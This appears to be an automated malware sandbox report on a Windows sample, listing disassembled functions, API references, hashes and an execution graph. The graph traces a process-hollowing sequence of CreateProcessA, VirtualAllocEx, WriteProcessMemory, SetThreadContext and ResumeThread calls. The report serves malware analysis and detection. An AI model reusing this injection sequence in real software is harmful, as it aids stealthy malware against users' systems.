                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task
                                                                                • String ID: aC$IC
                                                                                • API String ID: 118556049-1397272051
                                                                                • Opcode ID: 6ec4015f9153290efd7cbd59547a6219cdc2aeff093f395eedf6cab30c7f734c
                                                                                • Instruction ID: 84314422f65998bf548c1bbd6e13f26cb2672e95d21e19c1100c3b538eee8e7f
                                                                                • Opcode Fuzzy Hash: 6ec4015f9153290efd7cbd59547a6219cdc2aeff093f395eedf6cab30c7f734c
                                                                                • Instruction Fuzzy Hash: CE3154727002045BC718DE6CCA805AEB2D6AB88320760437FE51AC37D1EBB8CDF18399
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                                • API String ID: 0-3537543806
                                                                                • Opcode ID: 1ad5b2d83d0d7437ad3fbfbc1364292ac2a8272f74641c11a38da502a312962f
                                                                                • Instruction ID: 5627b466fc16fe25a6ac73c6d83cd0dce1d46dc0158702ade6124cbd8f36eb7a
                                                                                • Opcode Fuzzy Hash: 1ad5b2d83d0d7437ad3fbfbc1364292ac2a8272f74641c11a38da502a312962f
                                                                                • Instruction Fuzzy Hash: E8418471A00614AFDB129B9ACD819EFBBB8EF95710F1400AFF804A7211DB749E81C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004158B7: _free.LIBCMT ref: 004158C5
                                                                                  • Part of subcall function 00419D68: MultiByteToWideChar.KERNEL32(0041EE3F,00000100,E8458D00,00000000,00000000,00000020,?,0041FC08,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 00419DD8
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041596E,00000000,?,00000000,76C86490), ref: 0041578A
                                                                                • __dosmaperr.LIBCMT ref: 00415791
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                                                                                • String ID: nYA
                                                                                • API String ID: 4030486722-3618285603
                                                                                • Opcode ID: 1bd6245e1b783a69f019b7247750bbf715c608d024b32d772ea12df75f49ce99
                                                                                • Instruction ID: 4e0ffe10194fbe2ed9143b2195adefa918b10e5e07c271b241dfb4d79dfb2861
                                                                                • Opcode Fuzzy Hash: 1bd6245e1b783a69f019b7247750bbf715c608d024b32d772ea12df75f49ce99
                                                                                • Instruction Fuzzy Hash: 9D21D871500A11EBCB21AF26CC029DB77A9AFC0374F11451BF839976D1D778E891CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413A16
                                                                                • ___raise_securityfailure.LIBCMT ref: 00413AFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                • String ID: `VC
                                                                                • API String ID: 3761405300-3030579402
                                                                                • Opcode ID: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
                                                                                • Instruction ID: 655513bd97cfb9c56dfb21943b7c2d82163dca5128fe96feb08d75d27f7ac2b0
                                                                                • Opcode Fuzzy Hash: 88cca52f03d3994def1460f4c1c68c41a99f6ced113eff2d7c52e2e230f43919
                                                                                • Instruction Fuzzy Hash: 8F21D0B4610B04DAE714DF15FA86A947BE4FB48314FA4753AE6088B3A0E3B49585CF4D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,00412F09,?,00432AAC,00431D7C,?,00431D7C,00000001), ref: 00413BE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID: /A$k8A
                                                                                • API String ID: 3997070919-3859516898
                                                                                • Opcode ID: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
                                                                                • Instruction ID: 3da1a0905b8d33730f3829acd1f08bb64e64d6195ac3a8dc0638a79db0c406ed
                                                                                • Opcode Fuzzy Hash: 794ae15e6e0db31f4291640b4f98a2b51644340bbcec8a8c6aa1363c38b5e95a
                                                                                • Instruction Fuzzy Hash: 9E018F31A00209ABC7119F58D894BEEBBB8FF48754F15405AE914AB391E7B4BE41CBD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0041944F,-00000020,00000FA0,00000000,004053E3,?,00431DE8), ref: 0041A721
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                • String ID: InitializeCriticalSectionEx$k8A
                                                                                • API String ID: 2593887523-2382381216
                                                                                • Opcode ID: 3391b520c6901bc352ec01796cd00a3413996bd9626c6c132cfced3b2acc6b63
                                                                                • Instruction ID: 6a9a2a883630116b5a7302b714e21f7e52d919c2a86b10e74dfab1277b4aa897
                                                                                • Opcode Fuzzy Hash: 3391b520c6901bc352ec01796cd00a3413996bd9626c6c132cfced3b2acc6b63
                                                                                • Instruction Fuzzy Hash: 2EE0223124022CB7CF112F40EC09EEE7F25EB847A0F508022F91815160C7B98931ABD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Alloc
                                                                                • String ID: FlsAlloc$k8A
                                                                                • API String ID: 2773662609-3139832701
                                                                                • Opcode ID: 2dbc92310dfbe542a28b011b768efe413cf7707e9ab2d0817eca46dc4197000f
                                                                                • Instruction ID: 38852a9917cd94aa95cdbbe9751c97fbcfd74d9f8f148c69fb3bd545895d8ad7
                                                                                • Opcode Fuzzy Hash: 2dbc92310dfbe542a28b011b768efe413cf7707e9ab2d0817eca46dc4197000f
                                                                                • Instruction Fuzzy Hash: D9E0CD36741235B3D62127516C0EA9EBF08C7C0BA0B584033F909611419BDC08618ADE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:16.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:263
                                                                                Total number of Limit Nodes:16
                                                                                execution_graph 28578 6980b98 28579 6980ba6 28578->28579 28580 6980baa SendMessageW 28578->28580 28582 6980c5c 28580->28582 28583 c640d0 28584 c640e2 28583->28584 28589 c641e8 28584->28589 28587 c64118 28590 c6420d 28589->28590 28598 c642e3 28590->28598 28602 c642e8 28590->28602 28591 c640f9 28594 c63880 28591->28594 28595 c6388b 28594->28595 28610 c657fc 28595->28610 28597 c66a20 28597->28587 28600 c6430f 28598->28600 28599 c643ec 28599->28599 28600->28599 28606 c63e08 28600->28606 28603 c6430f 28602->28603 28604 c63e08 CreateActCtxA 28603->28604 28605 c643ec 28603->28605 28604->28605 28607 c65378 CreateActCtxA 28606->28607 28609 c6543b 28607->28609 28609->28609 28611 c65807 28610->28611 28614 c6581c 28611->28614 28613 c66ac5 28613->28597 28615 c65827 28614->28615 28618 c6584c 28615->28618 28617 c66ba2 28617->28613 28619 c65857 28618->28619 28622 c6587c 28619->28622 28621 c66ca2 28621->28617 28623 c65887 28622->28623 28624 c673be 28623->28624 28631 c69183 28623->28631 28635 c691b0 28623->28635 28639 c691ab 28623->28639 28625 c673fc 28624->28625 28643 c6b2e0 28624->28643 28649 c6b2db 28624->28649 28625->28621 28633 c691b0 LoadLibraryExW 28631->28633 28634 c691ab LoadLibraryExW 28631->28634 28632 c6918e 28632->28624 28633->28632 28634->28632 28636 c691bf 28635->28636 28655 c696a3 28635->28655 28660 c696b0 28635->28660 28636->28624 28641 c696a3 LoadLibraryExW 28639->28641 28642 c696b0 LoadLibraryExW 28639->28642 28640 c691bf 28640->28624 28641->28640 28642->28640 28644 c6b301 28643->28644 28645 c6b325 28644->28645 28677 c6b593 28644->28677 28681 c6b598 28644->28681 28685 c6b5fb 28644->28685 28645->28625 28651 c6b301 28649->28651 28650 c6b325 28650->28625 28651->28650 28652 c6b593 4 API calls 28651->28652 28653 c6b5fb 4 API calls 28651->28653 28654 c6b598 4 API calls 28651->28654 28652->28650 28653->28650 28654->28650 28656 c696c3 28655->28656 28657 c696d3 28656->28657 28665 c69933 28656->28665 28669 c69938 28656->28669 28657->28636 28661 c696c3 28660->28661 28662 c696d3 28661->28662 28663 c69933 LoadLibraryExW 28661->28663 28664 c69938 LoadLibraryExW 28661->28664 28662->28636 28663->28662 28664->28662 28666 c6994c 28665->28666 28667 c69971 28666->28667 28673 c692c8 28666->28673 28667->28657 28670 c6994c 28669->28670 28671 c692c8 LoadLibraryExW 28670->28671 28672 c69971 28670->28672 28671->28672 28672->28657 28674 c692cf LoadLibraryExW 28673->28674 28676 c69b91 28674->28676 28676->28667 28679 c6b5a5 28677->28679 28678 c6b5df 28678->28645 28679->28678 28690 c695c8 28679->28690 28683 c6b5a5 28681->28683 28682 c6b5df 28682->28645 28683->28682 28684 c695c8 4 API calls 28683->28684 28684->28682 28687 c6b5c3 28685->28687 28688 c6b5ff 28685->28688 28686 c6b5df 28686->28645 28687->28686 28689 c695c8 4 API calls 28687->28689 28688->28645 28689->28686 28691 c695d3 28690->28691 28693 c6c2d8 28691->28693 28694 c6be98 28691->28694 28693->28693 28695 c6bea3 28694->28695 28696 c6c347 28695->28696 28697 c6587c 4 API calls 28695->28697 28698 c6c355 28696->28698 28708 c6c3c0 28696->28708 28714 c6c3b0 28696->28714 28697->28696 28720 c6bea8 28698->28720 28700 c6c36f 28725 c6beb8 28700->28725 28702 c6c376 28729 c6e098 28702->28729 28740 c6e0b0 28702->28740 28703 c6c380 28703->28693 28709 c6c3ee 28708->28709 28710 c6c4bf 28709->28710 28712 c6c4ba KiUserCallbackDispatcher 28709->28712 28713 c6c52b 28709->28713 28711 c6beb8 LoadLibraryExW CreateWindowExW 28710->28711 28710->28713 28711->28713 28712->28710 28717 c6c3ee 28714->28717 28715 c6c4bf 28716 c6beb8 LoadLibraryExW CreateWindowExW 28715->28716 28719 c6c52b 28715->28719 28716->28719 28717->28715 28718 c6c4ba KiUserCallbackDispatcher 28717->28718 28717->28719 28718->28715 28722 c6beb3 28720->28722 28721 c6c134 LoadLibraryExW CreateWindowExW 28723 c6d4bc 28721->28723 28722->28721 28724 c6d4c1 28722->28724 28723->28700 28724->28700 28726 c6bec3 28725->28726 28727 c6c258 LoadLibraryExW CreateWindowExW 28726->28727 28728 c6dad7 28727->28728 28728->28702 28730 c6e0b0 28729->28730 28731 c6e0ed 28730->28731 28735 c69183 LoadLibraryExW 28730->28735 28736 c691b0 LoadLibraryExW 28730->28736 28737 c6e530 LoadLibraryExW 28730->28737 28738 c6e51f LoadLibraryExW 28730->28738 28739 c691ab LoadLibraryExW 28730->28739 28731->28703 28732 c6e12d 28733 c6eef3 CreateWindowExW 28732->28733 28734 c6eef8 CreateWindowExW 28732->28734 28733->28731 28734->28731 28735->28732 28736->28732 28737->28732 28738->28732 28739->28732 28742 c6e1d2 28740->28742 28743 c6e0e1 28740->28743 28741 c6e0ed 28741->28703 28742->28703 28743->28741 28747 c69183 LoadLibraryExW 28743->28747 28748 c691b0 LoadLibraryExW 28743->28748 28749 c6e530 LoadLibraryExW 28743->28749 28750 c6e51f LoadLibraryExW 28743->28750 28751 c691ab LoadLibraryExW 28743->28751 28744 c6e12d 28745 c6eef3 CreateWindowExW 28744->28745 28746 c6eef8 CreateWindowExW 28744->28746 28745->28742 28746->28742 28747->28744 28748->28744 28749->28744 28750->28744 28751->28744 28752 c6d050 28753 c6d06d 28752->28753 28754 c6beb8 2 API calls 28753->28754 28755 c6d0b1 28753->28755 28754->28755 28874 c69890 28875 c698d2 28874->28875 28876 c698d8 GetModuleHandleW 28874->28876 28875->28876 28877 c69905 28876->28877 28878 c6ff10 28879 c6ff28 28878->28879 28880 c6dc9c SetWindowLongW 28878->28880 28880->28879 28884 c6b6b0 28885 c6b716 28884->28885 28889 c6b860 28885->28889 28892 c6b870 28885->28892 28886 c6b7c5 28895 c69650 28889->28895 28893 c6b89e 28892->28893 28894 c69650 DuplicateHandle 28892->28894 28893->28886 28894->28893 28896 c6b8d8 DuplicateHandle 28895->28896 28897 c6b89e 28896->28897 28897->28886 28898 6981860 28899 6981887 28898->28899 28900 69818e8 28899->28900 28902 c6beb8 2 API calls 28899->28902 28903 c6daa3 28899->28903 28902->28900 28904 c6dab0 28903->28904 28907 c6c258 28904->28907 28906 c6dad7 28906->28900 28908 c6c263 28907->28908 28909 c6dfb2 28908->28909 28911 c6e0b0 2 API calls 28908->28911 28912 c6e098 2 API calls 28908->28912 28913 c6e051 28908->28913 28910 c6c258 2 API calls 28909->28910 28909->28913 28910->28909 28911->28909 28912->28909 28913->28906 28881 8929748 28883 89284a0 SetThreadContext 28881->28883 28882 8929769 28883->28882 28756 892105f 28757 8921066 28756->28757 28758 8921087 28757->28758 28760 89232b3 28757->28760 28761 89232cb 28760->28761 28766 89238d2 28761->28766 28770 8923720 28761->28770 28774 89238a0 28761->28774 28762 892347c 28762->28758 28767 8923884 28766->28767 28778 8923bdf 28767->28778 28768 89238b1 28768->28762 28771 8923748 28770->28771 28773 8923bdf 12 API calls 28771->28773 28772 89238b1 28772->28762 28773->28772 28775 89238a5 28774->28775 28777 8923bdf 12 API calls 28775->28777 28776 89238b1 28776->28762 28777->28776 28779 8923c1a 28778->28779 28780 8923dbf 28779->28780 28782 8927091 28779->28782 28780->28768 28785 8927470 28782->28785 28786 892747b 28785->28786 28789 8927e00 28786->28789 28792 8927ec8 28789->28792 28793 8927ed4 28792->28793 28794 892709d 28793->28794 28797 8928e8e 28793->28797 28802 8928faf 28793->28802 28794->28780 28798 8928e95 28797->28798 28817 8927a7a 28798->28817 28821 8927a78 28798->28821 28804 8928fc8 28802->28804 28803 892928d 28803->28793 28804->28803 28805 892920d 28804->28805 28813 89288c0 WriteProcessMemory 28804->28813 28814 89288c8 WriteProcessMemory 28804->28814 28825 89286e8 28804->28825 28828 8928a10 28804->28828 28832 8928a08 28804->28832 28836 8928ac0 28804->28836 28805->28803 28841 89298c0 28805->28841 28844 89298b0 28805->28844 28806 8929287 28849 892992f 28806->28849 28855 8929930 28806->28855 28813->28804 28814->28804 28818 8927b01 28817->28818 28818->28818 28819 8927c66 CreateProcessA 28818->28819 28820 8927cc3 28819->28820 28820->28820 28822 8927b01 28821->28822 28822->28822 28823 8927c66 CreateProcessA 28822->28823 28824 8927cc3 28823->28824 28824->28824 28826 892873f ReadProcessMemory 28825->28826 28827 8928770 28826->28827 28827->28804 28829 8928a50 VirtualAllocEx 28828->28829 28831 8928a8d 28829->28831 28831->28804 28833 8928a10 VirtualAllocEx 28832->28833 28835 8928a8d 28833->28835 28835->28804 28837 8928a70 28836->28837 28838 8928acb 28837->28838 28839 8928a78 VirtualAllocEx 28837->28839 28840 8928a8d 28839->28840 28840->28804 28842 89298e1 28841->28842 28861 89284a0 28841->28861 28842->28806 28845 89298ba 28844->28845 28846 892985f 28844->28846 28848 89284a0 SetThreadContext 28845->28848 28846->28806 28847 89298e1 28847->28806 28848->28847 28851 892994b 28849->28851 28865 8928ce8 28849->28865 28850 892995c 28850->28803 28851->28850 28869 c6dc9c 28851->28869 28872 c6ff38 SetWindowLongW 28851->28872 28858 8928ce8 ResumeThread 28855->28858 28856 892995c 28856->28803 28857 892994b 28857->28856 28859 c6dc9c SetWindowLongW 28857->28859 28860 c6ff38 SetWindowLongW 28857->28860 28858->28857 28859->28857 28860->28857 28862 89284e5 SetThreadContext 28861->28862 28864 892852d 28862->28864 28864->28842 28866 8928d28 ResumeThread 28865->28866 28868 8928d59 28866->28868 28868->28851 28870 c6ff40 SetWindowLongW 28869->28870 28871 c6ffac 28870->28871 28871->28851 28873 c6ffac 28872->28873 28873->28851

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 902 8927a78-8927b0d 904 8927b46-8927b66 902->904 905 8927b0f-8927b19 902->905 910 8927b68-8927b72 904->910 911 8927b9f-8927bce 904->911 905->904 906 8927b1b-8927b1d 905->906 908 8927b40-8927b43 906->908 909 8927b1f-8927b29 906->909 908->904 912 8927b2b 909->912 913 8927b2d-8927b3c 909->913 910->911 914 8927b74-8927b76 910->914 921 8927bd0-8927bda 911->921 922 8927c07-8927cc1 CreateProcessA 911->922 912->913 913->913 915 8927b3e 913->915 916 8927b78-8927b82 914->916 917 8927b99-8927b9c 914->917 915->908 919 8927b86-8927b95 916->919 920 8927b84 916->920 917->911 919->919 923 8927b97 919->923 920->919 921->922 924 8927bdc-8927bde 921->924 933 8927cc3-8927cc9 922->933 934 8927cca-8927d50 922->934 923->917 926 8927be0-8927bea 924->926 927 8927c01-8927c04 924->927 928 8927bee-8927bfd 926->928 929 8927bec 926->929 927->922 928->928 930 8927bff 928->930 929->928 930->927 933->934 944 8927d52-8927d56 934->944 945 8927d60-8927d64 934->945 944->945 948 8927d58 944->948 946 8927d66-8927d6a 945->946 947 8927d74-8927d78 945->947 946->947 949 8927d6c 946->949 950 8927d7a-8927d7e 947->950 951 8927d88-8927d8c 947->951 948->945 949->947 950->951 952 8927d80 950->952 953 8927d9e-8927da5 951->953 954 8927d8e-8927d94 951->954 952->951 955 8927da7-8927db6 953->955 956 8927dbc 953->956 954->953 955->956 957 8927dbd 956->957 957->957
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08927CAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: fb99cee4de534194f764be4580188a6095f7f16e0a8d6636fc9d27b089122ede
                                                                                • Instruction ID: 73e12ef5d9307b1e4dd32ceeba75c83c57100246dfec2f7348cfb54b2b55e45d
                                                                                • Opcode Fuzzy Hash: fb99cee4de534194f764be4580188a6095f7f16e0a8d6636fc9d27b089122ede
                                                                                • Instruction Fuzzy Hash: B9916A71D00229DFDF10EFA8C881BEDBAB6BF48319F048569D819B7244DB749985CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 959 8927a7a-8927b0d 961 8927b46-8927b66 959->961 962 8927b0f-8927b19 959->962 967 8927b68-8927b72 961->967 968 8927b9f-8927bce 961->968 962->961 963 8927b1b-8927b1d 962->963 965 8927b40-8927b43 963->965 966 8927b1f-8927b29 963->966 965->961 969 8927b2b 966->969 970 8927b2d-8927b3c 966->970 967->968 971 8927b74-8927b76 967->971 978 8927bd0-8927bda 968->978 979 8927c07-8927cc1 CreateProcessA 968->979 969->970 970->970 972 8927b3e 970->972 973 8927b78-8927b82 971->973 974 8927b99-8927b9c 971->974 972->965 976 8927b86-8927b95 973->976 977 8927b84 973->977 974->968 976->976 980 8927b97 976->980 977->976 978->979 981 8927bdc-8927bde 978->981 990 8927cc3-8927cc9 979->990 991 8927cca-8927d50 979->991 980->974 983 8927be0-8927bea 981->983 984 8927c01-8927c04 981->984 985 8927bee-8927bfd 983->985 986 8927bec 983->986 984->979 985->985 987 8927bff 985->987 986->985 987->984 990->991 1001 8927d52-8927d56 991->1001 1002 8927d60-8927d64 991->1002 1001->1002 1005 8927d58 1001->1005 1003 8927d66-8927d6a 1002->1003 1004 8927d74-8927d78 1002->1004 1003->1004 1006 8927d6c 1003->1006 1007 8927d7a-8927d7e 1004->1007 1008 8927d88-8927d8c 1004->1008 1005->1002 1006->1004 1007->1008 1009 8927d80 1007->1009 1010 8927d9e-8927da5 1008->1010 1011 8927d8e-8927d94 1008->1011 1009->1008 1012 8927da7-8927db6 1010->1012 1013 8927dbc 1010->1013 1011->1010 1012->1013 1014 8927dbd 1013->1014 1014->1014
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08927CAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.449611466.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_8920000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: dce1cc5fc70e39d6bff6f3d9cd889c2e753d266b3ad335f42b19a65e091ba59e
                                                                                • Instruction ID: a510d5dc49911a2d5af11d53d150f2e57161edc33ff04b769e03d37e87133f2f
                                                                                • Opcode Fuzzy Hash: dce1cc5fc70e39d6bff6f3d9cd889c2e753d266b3ad335f42b19a65e091ba59e
                                                                                • Instruction Fuzzy Hash: 5A916A71D00229DFDF10EFA8C881BEDBAB6BF48319F048569D819B7244DB349985CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1016 c6dc64-c6fd5e 1018 c6fd60-c6fd66 1016->1018 1019 c6fd69-c6fd70 1016->1019 1018->1019 1020 c6fd72-c6fd78 1019->1020 1021 c6fd7b-c6fe1a CreateWindowExW 1019->1021 1020->1021 1023 c6fe23-c6fe5b 1021->1023 1024 c6fe1c-c6fe22 1021->1024 1028 c6fe5d-c6fe60 1023->1028 1029 c6fe68 1023->1029 1024->1023 1028->1029 1030 c6fe69 1029->1030 1030->1030
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C6FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 491ebe285d3e7caaa6d45d2737a6ed1844d9cd8e2e9b3e3aeebb2d0ad0353610
                                                                                • Instruction ID: 0bbf8a7309f7e158fc5a64323a109af0bb32dae71a764693ec2200496efeb57e
                                                                                • Opcode Fuzzy Hash: 491ebe285d3e7caaa6d45d2737a6ed1844d9cd8e2e9b3e3aeebb2d0ad0353610
                                                                                • Instruction Fuzzy Hash: C751CFB1D003489FDF14CF99D984ADEBBB5FF48314F24812AE819AB214D775A945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1031 c6fcf3-c6fd5e 1032 c6fd60-c6fd66 1031->1032 1033 c6fd69-c6fd70 1031->1033 1032->1033 1034 c6fd72-c6fd78 1033->1034 1035 c6fd7b-c6fdb3 1033->1035 1034->1035 1036 c6fdbb-c6fe1a CreateWindowExW 1035->1036 1037 c6fe23-c6fe5b 1036->1037 1038 c6fe1c-c6fe22 1036->1038 1042 c6fe5d-c6fe60 1037->1042 1043 c6fe68 1037->1043 1038->1037 1042->1043 1044 c6fe69 1043->1044 1044->1044
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C6FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: c1d62550a173104d98e4e3f62b24d19cd0ba6561109dd1bafe7b1465931959fa
                                                                                • Instruction ID: b74bcccf158450fca8ed0bcf9070057e981a813edc56808b076c23953b3d2afe
                                                                                • Opcode Fuzzy Hash: c1d62550a173104d98e4e3f62b24d19cd0ba6561109dd1bafe7b1465931959fa
                                                                                • Instruction Fuzzy Hash: AC41CDB1D002489FDF14CF99D880ADEBFB5FF88310F24812AE819AB214D7759986CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1062 c6536c-c65439 CreateActCtxA 1064 c65442-c6549c 1062->1064 1065 c6543b-c65441 1062->1065 1072 c6549e-c654a1 1064->1072 1073 c654ab-c654af 1064->1073 1065->1064 1072->1073 1074 c654c0 1073->1074 1075 c654b1-c654bd 1073->1075 1076 c654c1 1074->1076 1075->1074 1076->1076
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C65429
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: e9ca72b1a85e7b73f1f374a4743ac0a0652e1a37fecf49bd499bce482288cac5
                                                                                • Instruction ID: 80ca090268f4f8e2288ba218fc05ae2e74995758a4d2fc29ecefbb39884306de
                                                                                • Opcode Fuzzy Hash: e9ca72b1a85e7b73f1f374a4743ac0a0652e1a37fecf49bd499bce482288cac5
                                                                                • Instruction Fuzzy Hash: 3B4102B1D0466CCBDF24CF99C884B9DBBB1BF88308F20816AD518BB254DB74694ACF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1045 c63e08-c65439 CreateActCtxA 1048 c65442-c6549c 1045->1048 1049 c6543b-c65441 1045->1049 1056 c6549e-c654a1 1048->1056 1057 c654ab-c654af 1048->1057 1049->1048 1056->1057 1058 c654c0 1057->1058 1059 c654b1-c654bd 1057->1059 1060 c654c1 1058->1060 1059->1058 1060->1060
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C65429
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.429886048.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_c60000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: b5f7d9f268660c9884c37f7676505bb11948408dc3fcc43e59f13bc80149f563
                                                                                • Instruction ID: 72427372a378bfebd90993b1f559af482ef8e4618e498171878d6a8111813fe9
                                                                                • Opcode Fuzzy Hash: b5f7d9f268660c9884c37f7676505bb11948408dc3fcc43e59f13bc80149f563
                                                                                • Instruction Fuzzy Hash: E441E2B0D0466CCBDB24CFA9C98479EBBB5BF88308F208169D509AB254DB756945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
